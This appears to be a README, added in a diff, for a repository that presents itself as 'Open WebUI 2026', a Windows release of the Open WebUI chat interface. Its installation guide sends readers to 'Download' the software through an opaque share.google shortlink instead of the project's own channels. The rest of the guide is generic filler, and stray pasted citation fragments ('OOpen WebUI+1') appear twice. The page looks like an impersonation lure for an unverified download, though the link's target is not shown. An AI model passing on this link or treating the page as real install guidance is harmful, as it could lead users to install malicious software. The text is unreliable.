mapchancellorhaul/open-webui-2026/README.md

 Open WebUI 2026 provides a unified interface for working with AI models, conversations, documents, knowledge bases, web search, tools, and automation.
 It can connect to Ollama and OpenAI-compatible providers while supporting both local and cloud-based AI workflows.
 OOpen WebUI+1

+## 📥 Installation Guide

+1. **[Download](https://share.google/bFyOivOsCEGWSSn1s)** Open WebUI 2026 for Windows.
+2. Choose the installation method appropriate for your environment.
+3. Install Open WebUI using the official installation instructions.
+4. Start the Open WebUI instance.
+5. Open the web interface in your browser.
+6. Connect Ollama or another supported AI provider.
+7. Select a model and start your first conversation.

+Open WebUI currently supports installation through Docker, Python/pip, uv, Kubernetes, and a desktop application.
+OOpen WebUI+1

 ---

 ## 🔑 Key Features